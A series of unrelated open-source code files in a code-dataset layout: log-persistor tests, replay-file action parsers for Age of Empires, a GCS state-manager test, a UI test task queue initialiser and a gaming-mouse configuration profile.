def AddHandler(self, handler):
"""Add a handler to the list of handlers registered with this persistor."""
if not handler in self._handlers:
self._handlers.append(handler)
def RemoveHandler(self, handler):
"""Remove a handler from the list of handlers registered with this persistor."""
if handler in self._handlers:
self._handlers.remove(handler)
def close(self, callback=None):
for h in list(self._handlers):
h.close()
if callback:
callback()
class _BasicLogHandler(BatchingLogHandler):
STORE_NAME = 'basic_store'
def __init__(self, *args, **kwargs):
super(_BasicLogHandler, self).__init__(*args, **kwargs)
self.batch_no = 0
def MakeBatch(self, buffer):
self.batch_no += 1
return LogBatch(buffer, self.STORE_NAME, 'basic', self.batch_no)
class LogBatchPersistorTestCase(BaseTestCase, testing.LogTrapTestCase):
def setUp(self):
options.options.fileobjstore = True
super(LogBatchPersistorTestCase, self).setUp()
InitObjectStore(temporary=True)
def tearDown(self):
super(LogBatchPersistorTestCase, self).tearDown()
def testPersistor(self):
"""Basic test for a log persistor."""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'),
LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'),
LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')]
for batch in batches:
persistor.PersistLogBatch(batch)
self._RunAsync(persistor.Wait)
# No files should have been backed up.
files = os.listdir(os.path.join(backup_dir, os.path.basename(sys.argv[0])))
self.assertEqual(0, len(files))
self._RunAsync(self._VerifyObjStoreBatches, batches)
def testBadObjStore(self):
"""Tests backup storage in case the object store is down. Also verifies close() method."""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'),
LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'),
LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')]
oldStores = [ObjectStore.GetInstance(ObjectStore.SERVER_LOG),
ObjectStore.GetInstance(ObjectStore.USER_LOG)]
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
_BadObjectStore(ObjectStore.SERVER_LOG_BUCKET,
temporary=True, fail_fast=False))
ObjectStore.SetInstance(ObjectStore.USER_LOG,
_BadObjectStore(ObjectStore.USER_LOG_BUCKET,
temporary=True, fail_fast=False))
# Cut the timeout allowed for flushing buffers on close to something small.
persistor._CLOSE_TIMEOUT_SECS = 0.100
for batch in batches:
persistor.PersistLogBatch(batch)
self._RunAsync(persistor.close)
self._VerifyBackupBatches(backup_dir, batches)
# Set a functional file object store instance and verify that it
# restores the pending server logs.
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
oldStores[0])
ObjectStore.SetInstance(ObjectStore.USER_LOG,
oldStores[1])
persistor = LogBatchPersistor(backup_dir=backup_dir)
self._RunAsync(persistor.Wait)
self._RunAsync(self._VerifyObjStoreBatches, batches)
def testRestoreTimeout(self):
"""Verifies the persistor will reattempt failed object store writes after a timeout"""
backup_dir = tempfile.mkdtemp()
persistor = LogBatchPersistor(backup_dir=backup_dir)
batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'),
LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'),
LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC')]
persistor._RESTORE_INTERVAL_SECS = 0.100
# The "bad" object store which does nothing with puts.
oldStore = ObjectStore.GetInstance(ObjectStore.SERVER_LOG)
ObjectStore.SetInstance(ObjectStore.SERVER_LOG,
_BadObjectStore(ObjectStore.SERVER_LOG_BUCKET,
temporary=True, fail_fast=True))
for batch in batches:
persistor.PersistLogBatch(batch)
self.io_loop.add_callback(partial(self._VerifyBackupBatches, backup_dir, batches))
# Reinstate the "good" object store.
ObjectStore.SetInstance(ObjectStore.SERVER_LOG, oldStore)
self._RunAsync(self.io_loop.add_timeout, time.time() + 0.200)
self._RunAsync(self._VerifyObjStoreBatches, batches)
def _SortBatchesByStore(self, batches):
batches_by_store = {}
for batch in batches:
key = batch.store_name
store_batches = batches_by_store.setdefault(key, [])
store_batches.append(batch)
return batches_by_store
def _VerifyObjStoreBatches(self, exp_batches, callback):
def _OnGetBatch(exp_batch, cb, buffer):
self.assertEqual(exp_batch.buffer, buffer)
cb()
def _OnListKeys(store, batches, cb, keys):
self.assertEqual(len(batches), len(keys))
with util.Barrier(cb) as b2:
for batch in batches:
self.assertIn(batch.Key(), keys)
store.Get(batch.Key(), partial(_OnGetBatch, batch, b2.Callback()))
batches_by_store = self._SortBatchesByStore(exp_batches)
with util.Barrier(callback) as b:
for store in batches_by_store.keys():
batches = batches_by_store[store]
store = ObjectStore.GetInstance(store)
store.ListKeys(partial(_OnListKeys, store, batches, b.Callback()))
def _VerifyBackupBatches(self, backup_dir, exp_batches):
batches_by_store = self._SortBatchesByStore(exp_batches)
dir = os.path.join(backup_dir, os.path.basename(sys.argv[0]))
store_dirs = os.listdir(dir)
self.assertEqual(len(batches_by_store.keys()), len(store_dirs))
for store in batches_by_store.keys():
self.assertIn(store, store_dirs)
store_dir = os.path.join(dir, store)
batches = batches_by_store[store]
self.assertEqual(len(batches), len(os.listdir(store_dir)))
for batch in batches:
file = os.path.join(store_dir, batch.FileSystemKey())
self.assertTrue(os.path.exists(file))
self.assertTrue(os.path.isfile(file))
with open(file, 'r') as f:
buffer = f.read()
self.assertEqual(batch.buffer, buffer)
class BatchingLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase):
def setUp(self):
super(BatchingLogHandlerTestCase, self).setUp()
self._persistor = _FakePersistor()
LogBatchPersistor.SetInstance(self._persistor)
def testBatching(self):
"""Tests that the server log writes to object store."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'})
basic_log.emit(record)
basic_log.flush()
self._RunAsync(self._VerifyLog, ['test'])
def testBadLogMessages(self):
"""Tests log messages with both 8-bit byte strings and unicode."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': '\x80abc'})
basic_log.emit(record)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': u'\x80abc'})
basic_log.emit(record)
basic_log.flush()
def testMultipleFlushes(self):
"""Tests multiple flushes."""
basic_log = _BasicLogHandler(flush_interval_secs=0.100)
for i in xrange(8):
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test%d' % i})
basic_log.emit(record)
basic_log.flush()
self._RunAsync(self._VerifyLog, ['test%d' % i for i in range(8)])
def testMaxBytesFlush(self):
"""Tests that the server log flushes based on maximum bytes written."""
basic_log = _BasicLogHandler(max_buffer_bytes=100)
msg = 'test' * 100
record = logging.makeLogRecord({'level': logging.INFO, 'msg': msg})
basic_log.emit(record)
self._RunAsync(self._VerifyLog, [msg])
def testTimeoutFlush(self):
"""Tests that the server log flushes after maximum flush interval."""
basic_log = _BasicLogHandler(flush_interval_secs=0.100)
record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'})
basic_log.emit(record)
self._RunAsync(self.io_loop.add_timeout, time.time() + 0.150)
self._RunAsync(self._VerifyLog, ['test'])
def testFinishServerLog(self):
"""Verify that 'close()' is called on the server handler when the persistor
is closed.
"""
persistor = _FakePersistor()
InitServerLog(persistor)
self.assertEqual(2, len(persistor._handlers))
basic_handler = _BasicLogHandler()
basic_handler.setLevel(logging.INFO)
with basic_handler.LoggingContext():
self.assertEqual(3, len(persistor._handlers))
self.assertEqual(0, len(persistor.batches))
logging.info('Test Message')
self.assertEqual(3, len(persistor._handlers))
self._RunAsync(FinishServerLog)
self.assertEqual(0, len(persistor._handlers))
self.assertEqual(2, len(persistor.batches))
def testFinishServerLogWithErrors(self):
"""Verify that the error log handler properly batches.
"""
persistor = _FakePersistor()
InitServerLog(persistor)
self.assertEqual(2, len(persistor._handlers))
basic_handler = _BasicLogHandler()
basic_handler.setLevel(logging.INFO)
with basic_handler.LoggingContext():
self.assertEqual(3, len(persistor._handlers))
self.assertEqual(0, len(persistor.batches))
logging.error('Test Error')
self.assertEqual(3, len(persistor._handlers))
self._RunAsync(FinishServerLog)
self.assertEqual(0, len(persistor._handlers))
self.assertEqual(3, len(persistor.batches))
def _VerifyLog(self, exp_msgs, callback):
"""Verifies that there are len('exp_msg') batches stored
and that each contains the expected message as contents.
"""
def _DoVerify():
batches = self._persistor.batches
self.assertEqual(len(batches), len(exp_msgs))
for key, msg in zip(sorted(batches.keys()), exp_msgs):
value = batches[key].buffer
regexp = re.compile('\[pid:[0-9]+\] .*:[0-9]+: %s' % msg)
self.assertTrue(regexp.search(value) is not None, '%s not found in %s' % (msg, value))
callback()
self.io_loop.add_callback(_DoVerify)
class ServerLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase):
def testErrorCounters(self):
"""Verify that error-counting performance counters are working correctly.
These performance counters are implemented as a log filter.
"""
meter = counters.Meter(counters.counters.viewfinder.errors)
InitServerLog(_FakePersistor())
def _CheckCounters(expected_errors, expected_warnings):
sample = meter.sample()
self.assertEqual(expected_errors, sample.viewfinder.errors.error)
self.assertEqual(expected_warnings, sample.viewfinder.errors.warning)
_CheckCounters(0, 0)
old_level = logging.getLogger().level
logging.getLogger().setLevel(logging.DEBUG)
logging.critical('Critical')
logging.error('Error1')
logging.warning('Warning1')
logging.warning('Warning2')
logging.getLogger().setLevel(old_level)
self._RunAsync(FinishServerLog)
_CheckCounters(2, 2)
_CheckCounters(0, 0)
|
mgz/body/actions.py | Namek/aoc-mgz | 117 | 12730158 | """Actions."""
from construct import (Array, Byte, Const, CString, Flag, Float32l, If,
Int16ul, Int32sl, Int32ul, Padding, Peek, String,
Struct, this, Bytes, Embedded, IfThenElse)
from mgz.body.achievements import achievements
from mgz.enums import (DiplomacyStanceEnum, FormationEnum, GameActionModeEnum,
OrderTypeEnum, ReleaseTypeEnum, ResourceEnum,
ResourceLevelEnum, RevealMapEnum, StanceEnum,
AgeEnum, VictoryEnum)
from mgz.util import TimeSecAdapter, check_flags
# pylint: disable=invalid-name, bad-continuation
# Not all actions are defined, not all actions are complete.
interact = "interact"/Struct(
"player_id"/Byte,
Const(b"\x00\x00"),
"target_id"/Int32ul,
"selected"/Int32ul,
"x"/Float32l,
"y"/Float32l,
"next"/Peek(Bytes(8)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8)),
"unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
give_attribute = "give_attribute"/Struct(
"player_id"/Byte,
"target_id"/Byte,
"attribute"/Byte,
"amount"/Float32l
)
add_attribute = "add_attribute"/Struct(
"player_id"/Byte,
"attribute"/Byte,
Padding(1),
"amount"/Float32l
)
create = "create"/Struct(
Padding(1),
"unit_type"/Int16ul,
"player_id"/Byte,
Padding(1),
"x"/Float32l,
"y"/Float32l,
"z"/Float32l
)
ai_interact = "ai_interact"/Struct(
Padding(3),
"target_id"/Int32ul,
"selected"/Byte,
Padding(3),
"x"/Float32l,
"y"/Float32l,
If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
move = "move"/Struct(
"player_id"/Byte,
Const(b"\x00\x00"),
Padding(4),
"selected"/Int32ul,
"x"/Float32l,
"y"/Float32l,
If(lambda ctx: ctx.selected < 0xff, Struct(
"next"/Peek(Bytes(8)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8))
)),
"unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array(
lambda ctx: ctx.selected, Int32ul
))
)
ai_move = "ai_move"/Struct(
"selected"/Byte,
"player_id"/Byte,
"player_num"/Byte,
Padding(4),
Padding(4),
"target_id"/Int32ul,
Padding(1),
Padding(3),
"x"/Float32l,
"y"/Float32l,
Padding(4),
Padding(4),
Padding(4),
If(lambda ctx: ctx.selected > 0x01, Array(
lambda ctx: ctx.selected, "unit_ids"/Int32ul
))
)
resign = "resign"/Struct(
"player_id"/Byte,
"player_num"/Byte,
"disconnected"/Flag
)
spec = "spec"/Struct(
Padding(lambda ctx: ctx._._.length - 1)
)
queue = "queue"/Struct(
Padding(3),
"building_id"/Int32ul,
"unit_type"/Int16ul,
"number"/Int16ul,
)
multiqueue = "multiqueue"/Struct(
Padding(3),
"unit_type"/Int16ul,
"num_buildings"/Byte,
"queue_amount"/Byte,
Array(lambda ctx: ctx.num_buildings, "building_ids"/Int32ul)
)
ai_queue = "ai_queue"/Struct(
Padding(3),
"building_id"/Int32ul,
"player_id"/Int16ul,
"unit_type"/Int16ul,
Padding(4)
)
research = "research"/Struct(
Padding(3),
"building_id"/Int32ul,
"player_id"/Int16ul,
"next"/Peek(
Struct(
Padding(6),
"check"/Int32sl
)
),
IfThenElse(lambda ctx: ctx.next.check == -1,
Embedded(Struct(
"selected"/Int16ul,
"technology_type"/Int32ul,
Array(lambda ctx: ctx.selected, "selected_ids"/Int32sl)
)),
Embedded(Struct(
"technology_type"/Int16ul,
Array(1, "selected_ids"/Int32sl)
))
)
)
sell = "sell"/Struct(
"player_id"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Byte,
Padding(4)
)
buy = "buy"/Struct(
"player_id"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Byte,
Padding(4)
)
stop = "stop"/Struct(
"selected"/Byte,
Array(lambda ctx: ctx.selected, "object_ids"/Int32ul)
)
stance = "stance"/Struct(
"selected"/Byte,
StanceEnum("stance_type"/Byte),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
guard = "guard"/Struct(
"selected"/Byte,
Padding(2),
"guarded_unit_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
follow = "follow"/Struct(
"selected"/Byte,
Padding(2),
"followed_unit_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
formation = "formation"/Struct(
"selected"/Byte,
"player_id"/Int16ul,
FormationEnum("formation_type"/Int32ul),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
save = "save"/Struct(
"exited"/Flag,
"player_id"/Byte,
"filename"/CString(encoding='latin1'),
Padding(lambda ctx: ctx._._.length - 23),
"checksum"/Int32ul
)
chapter = "chapter"/Struct(
"player_id"/Byte
)
build = "build"/Struct(
"selected"/Byte,
"player_id"/Int16ul,
"x"/Float32l,
"y"/Float32l,
"building_type"/Int32ul,
Padding(4),
"sprite_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
game = "game"/Struct(
"mode"/GameActionModeEnum("mode_id"/Byte),
"player_id"/Byte,
Padding(1),
"diplomacy"/If(this.mode == 'diplomacy', Struct(
"target_player_id"/Byte,
Padding(3),
"stance_float"/Float32l,
"stance"/DiplomacyStanceEnum("stance_id"/Byte),
)),
"speed"/If(this.mode == 'speed', Struct(
Padding(4),
"speed"/Float32l,
Padding(1)
)),
"instant_build"/If(this.mode == 'instant_build', Struct(
Padding(9)
)),
"quick_build"/If(this.mode == 'quick_build', Struct(
"status"/Flag,
Padding(8),
)),
"allied_victory"/If(this.mode == 'allied_victory', Struct(
"player_id"/Byte,
"status"/Flag,
Padding(7)
)),
"cheat"/If(this.mode == 'cheat', Struct(
"cheat_id"/Byte,
Padding(8)
)),
"unk0"/If(this.mode == 'unk0', Struct(
Padding(9)
)),
"spy"/If(this.mode == 'spy', Struct(
Padding(9)
)),
"unk1"/If(this.mode == 'unk1', Struct(
Padding(9)
)),
"farm_queue"/If(this.mode == 'farm_queue', Struct(
"amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research
Padding(8)
)),
"farm_unqueue"/If(this.mode == 'farm_unqueue', Struct(
"amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research
Padding(8)
)),
# toggle farm auto seed queue
"farm_autoqueue"/If(this.mode == 'farm_autoqueue', Struct(
Padding(9)
)),
"fishtrap_queue" / If(this.mode == 'fishtrap_queue', Struct(
"amount" / Byte,
Padding(8)
)),
"fishtrap_unqueue" / If(this.mode == 'fishtrap_unqueue', Struct(
"amount" / Byte,
Padding(8)
)),
# toggle fish trap auto place queue
"fishtrap_autoqueue"/If(this.mode == 'fishtrap_autoqueue', Struct(
Padding(9)
)),
# toggles the default stance when units are created. All players start on aggressive by default, if the player
# (initially) has defensive enabled it is called right before the first unit is queued, and again every time
# the player toggles it in the game options menu
"default_stance" / If(this.mode == 'default_stance', Struct(
Padding(9)
)),
Padding(3)
)
droprelic = "droprelic"/Struct(
Const(b"\x00\x00\x00"),
'unit_id'/Int32ul
)
wall = "wall"/Struct(
"selected"/Byte,
"player_id"/Byte,
IfThenElse(lambda ctx: ctx._._.length - 16 - (ctx.selected * 4) == 8,
Embedded(Struct(
Padding(1),
"start_x"/Int16ul,
"start_y"/Int16ul,
"end_x"/Int16ul,
"end_y"/Int16ul,
"building_id"/Int32ul,
Padding(4),
"flags"/Bytes(4)
)),
Embedded(Struct(
"start_x"/Byte,
"start_y"/Byte,
"end_x"/Byte,
"end_y"/Byte,
Padding(1),
"building_id"/Int32ul,
Padding(4),
))
),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
delete = "delete"/Struct(
Padding(3),
"object_id"/Int32ul,
"player_id"/Int32ul
)
attackground = "attackground"/Struct(
"selected"/Byte,
Padding(2),
"x"/Float32l,
"y"/Float32l,
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
tribute = "tribute"/Struct(
"player_id"/Byte,
"player_id_to"/Byte,
ResourceEnum("resource_type"/Byte),
"amount"/Float32l,
"fee"/Float32l
)
repair = "repair"/Struct(
"selected"/Byte,
Padding(2),
"repaired_id"/Int32ul,
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
release = "release"/Struct(
"selected"/Int16ul,
Padding(1),
"x"/Float32l, # -1 if none
"y"/Float32l, # -1 if none
ReleaseTypeEnum("release_type"/Byte),
Padding(3),
"release_id"/Int32ul,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
"""
unload = "unload"/Struct(
"selected"/Int16ul,
Padding(1),
"x"/Float32l, # -1 if none
"y"/Float32l, # -1 if none
Padding(4),
Padding(4), # 0xffffffff
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
"""
togglegate = "togglegate"/Struct(
Padding(3),
"gate_id"/Int32ul
)
flare = "flare"/Struct(
Padding(7),
Array(9, "player_ids"/Byte),
Padding(3),
"x"/Float32l,
"y"/Float32l,
"player_id"/Byte,
"player_number"/Byte,
Padding(2)
)
order = "order"/Struct(
"selected"/Byte,
Padding(2),
"building_id"/Int32sl, # -1 cancels production queue
OrderTypeEnum("order_type"/Byte),
"cancel_order"/Byte, # when cancelling production queue, this indicates which item in the queue is to be cancelled
Padding(2),
"x"/Float32l,
"y"/Float32l,
Padding(4), # const
"next"/Peek(Bytes(4)),
"flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
gatherpoint = "gatherpoint"/Struct(
"selected"/Byte,
Padding(2),
"target_id"/Int32ul,
"target_type"/Int32ul,
"x"/Float32l,
"y"/Float32l,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
townbell = "townbell"/Struct(
Padding(3),
"towncenter_id"/Int32ul,
"active"/Int32ul
)
"""Patrol
10 X-coordinates followed by 10 Y-coordinates
First of each is popped off for consistency with other actions
"""
patrol = "patrol"/Struct(
"selected"/Byte,
"waypoints"/Int16ul,
"x"/Float32l,
Array(9, "x_more"/Float32l),
"y"/Float32l,
Array(9, "y_more"/Float32l),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
waypoint = "waypoint"/Struct(
Padding(1),
"selected"/Byte,
"x"/Byte,
"y"/Byte,
"building_ids"/If(lambda ctx: ctx.selected != 255, Array(
lambda ctx: ctx.selected, Int32ul
))
)
ai_waypoint = "ai_waypoint"/Struct(
"selected"/Byte,
"waypoint_count"/Byte,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
Array(lambda ctx: ctx.waypoint_count, "x_more"/Byte),
Array(lambda ctx: ctx.waypoint_count, "y_more"/Byte)
)
backtowork = "backtowork"/Struct(
Padding(3),
"towncenter_id"/Int32ul
)
ai_command = "ai_command"/Struct(
Padding(lambda ctx: ctx._._.length - 1)
)
"""DE Queue
In DE queue and multi queue share the same command
"""
de_queue = "de_queue"/Struct(
"player_id"/Byte,
"building_type"/Int16ul,
"selected"/Byte,
Padding(1),
"unit_type"/Int16ul,
"queue_amount"/Byte,
Padding(1),
Array(lambda ctx: ctx.selected, "building_ids"/Int32ul)
)
"""DE Attack Move
It's almost the same as Patrol.
10 X-coordinates followed by 10 Y-coordinates
First of each is popped off for consistency with other actions
"""
de_attackmove = "de_attackmove"/Struct(
"selected"/Byte,
"waypoints"/Int16ul,
"x"/Float32l,
Array(9, "x_more"/Float32l),
"y"/Float32l,
Array(9, "y_more"/Float32l),
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul),
)
postgame = "achievements"/Struct(
Padding(3),
"scenario_filename"/String(32, padchar=b'\x00', trimdir='right', encoding='latin1'),
"player_num"/Byte,
"computer_num"/Byte,
Padding(2),
Peek("duration_int"/Int32ul),
TimeSecAdapter("duration"/Int32ul),
"cheats"/Flag,
"complete"/Flag,
Padding(2),
"db_checksum"/Int32ul,
"code_checksum"/Int32ul,
"version"/Float32l,
"map_size"/Byte,
"map_id"/Byte,
"population"/Int16ul,
Peek("victory_type_id"/Byte),
VictoryEnum("victory_type"/Byte),
Peek("starting_age_id"/Byte),
AgeEnum("starting_age"/Byte),
Peek("starting_resources_id"/Byte),
ResourceLevelEnum("starting_resources"/Byte),
"all_techs"/Flag,
"random_positions"/Flag,
RevealMapEnum("reveal_map"/Byte),
"is_deathmatch"/Flag,
"is_regicide"/Flag,
"starting_units"/Byte,
"lock_teams"/Flag,
"lock_speed"/Flag,
Padding(1),
Array(lambda ctx: ctx.player_num, achievements),
Padding(4),
Array(lambda ctx: (8 - ctx.player_num) * 63, Padding(4)),
)
de_autoscout = "de_autoscout"/Struct(
"selected"/Byte,
Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul)
)
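# Hedged example (not part of the original mgz module above): every action here is a
# `construct` Struct, so it can be parsed straight from raw bytes. The 3-byte payload
# below is fabricated purely to illustrate the call pattern.
if __name__ == "__main__":
    sample = resign.parse(b"\x02\x02\x00")
    print(sample.player_id, sample.player_num, sample.disconnected)  # 2 2 False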
|
tests/system/test_state_manager.py | ajw0100/professional-services-data-validator | 167 | 12730219 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from data_validation import state_manager
GCS_STATE_PATH = "gs://pso-kokoro-resources/state/"
TEST_CONN_NAME = "example"
TEST_CONN = {
"source_type": "BigQuery",
"project_id": "my-project",
}
def test_get_gcs_file_path():
manager = state_manager.StateManager(GCS_STATE_PATH)
result_path = manager._get_gcs_file_path(GCS_STATE_PATH + "file/path/name.json")
assert result_path == "state/file/path/name.json"
def test_gcs_create_and_get_connection_config():
manager = state_manager.StateManager(GCS_STATE_PATH)
manager.create_connection(TEST_CONN_NAME, TEST_CONN)
config = manager.get_connection_config(TEST_CONN_NAME)
assert config == TEST_CONN
def test_list_connections():
manager = state_manager.StateManager(GCS_STATE_PATH)
expected = set(["example", "my_bq_conn"])
connections = manager.list_connections()
assert set(connections) == expected
def test_create_invalid_gcs_path_raises():
# Unknown file paths will be created by the state manager
files_directory = "gs://!!bucket!!/this/path/"
with pytest.raises(ValueError, match=r"GCS Path Failure .*"):
state_manager.StateManager(files_directory)
|
AutotestFramework/runfunc/ui_initial.py | yangjourney/sosotest | 422 | 12730227 | <gh_stars>100-1000
import logging
import logging.handlers
import socket,os,threading
from core.const.Do import Do
from core.const.GlobalConst import ExecStatus
from core.tools.DBTool import DBTool
from core.tools.TypeTool import TypeTool
from runfunc.initial import init_logging
from runfunc.ui_threadProcess import *
from core.config.InitConfig import *
import socket,traceback,os
from core.tools.CommonFunc import *
from allmodels_ui.UITestTask import UITestTask
from threads.UITaskThread import UITaskThread
from copy import deepcopy
##########################################################################################################
##########################################################################################################
##########################################################################################################
uiTaskQueue = []
uiTaskCancelQueue = []
maxUITaskThreadNums = 7 # maximum number of UI test tasks that can run in parallel
maxWebThreadNums = 5
maxAndroidThreadNums = 3
maxIosThreadNums = 4
executingWebThreadNum = 0 # number of web UI test tasks currently executing
executingIosThreadNum = 0 # number of iOS UI test tasks currently executing
executingAndroidThreadNum = 0 # number of Android UI test tasks currently executing
executingUITaskThreadNum = 0 # number of UI test tasks currently executing
executintUITaskThreadDict = {} # dict of currently alive UI task threads
executintWebThreadDict = {} # dict of currently alive web threads
executintIosThreadDict = {} # dict of currently alive iOS threads
executintAndroidThreadDict = {} # dict of currently alive Android threads
##########################################################################################################
##########################################################################################################
##########################################################################################################
def init_ui_task_queue():
db = DBTool().initGlobalDBConf()
    # DONE: initialize taskrun, e.g. {'do': 3, 'TaskExecuteId': '1'}
colsStr = "id"
tbName = "tb_ui_test_execute"
whereStr = "execStatus = %d or execStatus = %d " % (ExecStatus.NOTRUN, ExecStatus.RUNNING)
orderBy = "addTime asc"
sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy)
res = db.execute_sql(sql)
    # reset all emulators
mobileServer = db.execute_sql("UPDATE tb_ui_mobile_server SET STATUS = 0")
db.release()
logging.debug("init_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res))
if res == False:
logging.error("init_ui_task_queue: 初始化任务执行队列失败!")
return False
if mobileServer == False:
logging.error("init_ui_task_queue: 初始化模拟器状态失败!")
return False
for tRes in res:
tmpData = {}
tmpData[Do.KEY_DO] = Do.TYPE_UITASK_EXECUTE
tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id']
uiTaskQueue.append(tmpData)
logging.info("init_ui_task_queue: uiTaskQueue加入新data:%s 。来源表:%s" % (tmpData, tbName))
logging.info("init_ui_task_queue: uiTaskQueue:%s" % uiTaskQueue)
logging.info("init_ui_task_queue: 初始化任务执行表完成uiTaskQueue:%s" % uiTaskQueue)
def init_cancel_ui_task_queue():
db = DBTool().initGlobalDBConf()
# DONE 初始化 taskrun {'do': 3, 'TaskExecuteId': '1'}
colsStr = "id"
tbName = "tb_ui_test_execute"
whereStr = "execStatus = %d " % (ExecStatus.CANCELING)
orderBy = "addTime asc"
sql = "select %s from %s where %s order by %s" % (colsStr, tbName, whereStr, orderBy)
res = db.execute_sql(sql)
db.release()
logging.debug("init_cancel_ui_task_queue: 初始化tb_ui_test_execute结果:%s" % str(res))
if res == False:
logging.error("init_cancel_ui_task_queue: 初始化任务执行队列失败!")
return False
for tRes in res:
tmpData = {}
tmpData[Do.KEY_DO] = Do.TYPE_UITASK_CANCEL
tmpData[Do.KEY_UITASK_EXEC_ID] = tRes['id']
uiTaskCancelQueue.append(tmpData)
logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue加入新data:%s 。来源表:%s" % (tmpData, tbName))
logging.info("init_cancel_ui_task_queue: uiTaskCancelQueue:%s" % uiTaskCancelQueue)
logging.info("init_cancel_ui_task_queue: 初始化任务执行表完成uiTaskCancelQueuee:%s" % uiTaskCancelQueue)
|
rivalcfg/devices/rival3_wireless.py | Clueninja/rivalcfg | 604 | 12730234 | <gh_stars>100-1000
from .. import usbhid
profile = {
"name": "SteelSeries Rival 3 Wireless",
"models": [
{
"name": "SteelSeries Rival 3 Wireless (2.4 GHz mode)",
"vendor_id": 0x1038,
"product_id": 0x1830,
"endpoint": 3,
},
],
"settings": {
"sensitivity": {
"label": "Sensibility presets",
"description": "Set sensitivity preset (DPI)",
"cli": ["-s", "--sensitivity"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x20],
"value_type": "multidpi_range",
"input_range": [100, 18000, 100],
"output_range": [0x00, 0xD6, 1.2],
"dpi_length_byte": 2,
"first_preset": 1,
"count_mode": "number",
"max_preset_count": 5,
"default": "400, 800, 1200, 2400, 3200",
},
"polling_rate": {
"label": "Polling rate",
"description": "Set polling rate (Hz)",
"cli": ["-p", "--polling-rate"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x17],
"value_type": "choice",
"choices": {
125: 0x03,
250: 0x02,
500: 0x01,
1000: 0x00,
},
"default": 1000,
},
"buttons_mapping": {
"label": "Buttons mapping",
"description": "Set the mapping of the buttons",
"cli": ["-b", "--buttons"],
"report_type": usbhid.HID_REPORT_TYPE_OUTPUT,
"command": [0x19],
"value_type": "buttons",
# fmt: off
"buttons": {
"Button1": {"id": 0x01, "offset": 0x00, "default": "button1"},
